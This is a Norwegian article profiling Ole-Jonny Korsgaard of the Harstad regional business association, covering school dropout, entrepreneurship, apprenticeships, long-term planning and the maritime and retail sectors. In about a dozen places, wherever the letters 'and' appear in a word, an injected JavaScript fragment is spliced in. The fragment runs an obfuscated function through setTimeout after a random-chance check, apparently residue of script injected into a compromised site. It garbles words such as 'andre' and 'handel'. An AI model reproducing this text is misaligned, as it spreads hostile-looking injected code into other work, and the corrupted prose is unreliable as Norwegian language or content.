Med fokus på innovasjon, ansvarlighet og langsiktighet

Ole-Jonny Korsgaard, daglig leder i Harstadregionens Næringsforening.

Ole-Jonny Korsgaard, daglig leder i Harstadregionens Næringsforening (HRNF), er klar i sin tale: ”Vi må heie på de som er villige til å prøve. Idékraft trenger et bra team!”.

Han viser til de urovekkende frafallstallene i videregående skoler, og til det faktum at vi møter et næringsliv som er i endring. Arbeidsplasser forsvinner og morgendagens arbeidstakere blir nødt til å arbeide med andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre oppgaver. Med helt nye ting. Det er også derfor Korsgaard brenner for at det skal skapes arenaer for unge gründere. Her mener han kommunen må ta en aktiv rolle for å skape rom, både fysisk og økonomisk, for å teste ut nye ideer og tanker.

 

”Vi må bli mer skapende i det vi gjør, og praktikere må få mulighet til å utvise kreativitet. Vi må favne om innovasjon, all forbedring ligger i forandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andring!”
sier Ole-Jonny.

 

Bedriftene må ta ansvar

Med Ungt Entreprenørskap som medlem i HRNF, bringes de unges perspektiv inn i debatten rundt hva næringslivet bør fokusere på. ”Vi må sørge for at det vi bestemmer oss for å satse på ivaretar det yrkesfaglige”, sier Korsgaard. Han viser til at Harstad har en godt utviklet industri for å tilby lærlinge- og praksisplasser. ”Her må bedriftene involveres, de må ta sin del av ansvaret. Gjennom å garantere lærlingeplasser innen næringer som havbruk, mekaniske fag og byggfag vil vi også kunne tilrettelegge for å bevare og videreutvikle utdanningstilbudene i kommunen, og sikre rekruttering til næringene i fremtiden.” forsetter Korsgaard. Han mener at spesielt nærheten til havet og kompetansen som vi har innenfor hele industrien i blå sektor ikke utnyttes godt nok i dag. Dette er et område der vi har gode muligheter for vekst innenfor både næringsliv og utdanning.

 

Langsiktighet

Det at vi opererer med fireårstermer er uheldig. Ole-Jonny mener at kommunens strategiarbeid må sees i et mye lengre perspektiv, både når det gjelder satsninger innenfor utdanning og for hvordan vi legger til rette for næringslivet. Han etterlyser en større forutsigbarhet fra det offentlige. Det vil trigge investeringslyst i mye større grad dersom vi vet hvor vi skal.

 

Samhandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andling for å trygge fremtiden

HRNF arbeider næringspolitisk med saker som medlemmene ønsker å påvirke og taler deres sak der de ønsker å være representert. Satsningsområdene omfatter arealplanlegging, samferdsel og infrastruktur, og HRNF er representert i Flyplassutvalget for Harstad/Narvik lufthavn, Evenes. Foreningen skal også ha en tydelig nettverksrolle. Ole-Jonny jobber tett opp mot politikere og foreningen bidrar med kompetansehevende tiltak gjennom å hente inn eksterne aktører til å holde foredrag for medlemmene. HRNF er bevisst på at dersom vi skal lykkes fremover, så er et godt samarbeid med partene i arbeidslivet, som NHO, LO og andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre, svært viktig.

 

Korsgaard ønsker at kommunen må spille enda mer på lag med næringsaktørene. Han viser til Tromsø og Bodø der de politiske «kjepphestene» legges til side når næringsutvikling står på agendaen.

 

Handom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andelsby og sentrum for blå sektor

Korsgaard peker på at vi har mye å bygge på i Harstad og regionen rundt med aktører som Harstad Skipsindustri, Hamek, Seaworks og Grovfjord Mek. innenfor maritim industri. I tillegg stiller Polarkonsult og NSK i verdensklasse med sin kompetanse. Innenfor blå sektor er vi sterke, og her mener Ole-Jonny at vi bør ta et sterkere regionalt grep på ringvirkningene i havbruksnæringen. For mye går ut av regionen. Vi burde arbeide strategisk for å få til mer lokal produksjon, både når det gjelder foredling og gjennom leverandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andørindustri innenfor utvikling av diverse utstyr fra leverandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andørsiden. Når det gjelder eksport av fisk fra regionen, så ser en for seg en dobling i løpet av de neste fem årene. Dette vil også skape nye muligheter, både lokalt og regionalt.

 

Harstad står sterkt innen service og handom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andel, og næringen er fortsatt i vekst. Byen har stor attraktivitet på grunn av en godt utviklet handom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andelsnæring med store aktører som XXL og Jula. ”Da er det synd at vi har få lærlinge- og praksisplasser i denne næringen.” Nok en gang påpeker Korsgaard at ungdommen må med. ”Men blant alle disse store må man ikke glemme at Harstad har flere spennende nisjebutikker, og det er viktig å støtte opp rundt denne knoppskytingen som bidrar til mangfold og mer unike tilbud.”

 

Om Ole-Jonny skulle tegne et ønsket fremtidsbilde for regionen, ville det være prioritert slik:

1.    Lavest andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andel i landom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andet på dropout i videregående skoler

2.    Et godt etablert system for å dyrke frem gründere og unge etablerere (der vi som har lyktes tar ansvar for å bidra til de som kommer etter)

3.    God utnyttelse av vekstpotensialet innen blå sektor og handom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andel og service.

 

Fakta om Harstadregionens Næringsforening (HRNF)

• Harstadregionens Næringsforening (HRNF) ble stiftet i 2006 som en ”datterforening” til Harstad Profileringspool.

• HRNF skulle samordne næringsinteressene for å ta en tydelig og markert næringspolitisk rolle og være en pådriver og katalysator for å skape mer koordinert næringsutvikling.

• HRNF har et samarbeid med Ibestad Kommune.

• 251 medlemsbedrifter fra Harstad og omlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and, de minste med 1-3 ansatte og de største med godt over 100 ansatte.

• To årsverk, daglig leder Ole-Jonny Korsgaard.

• HRNF rekrutterer medlemmer gjennom å skape oppmerksomhet rundt aktuelle saker og synliggjøre arbeidet som de utfører. Ole-Jonny reiser også ut og møter bedrifter som er potensielle medlemmer.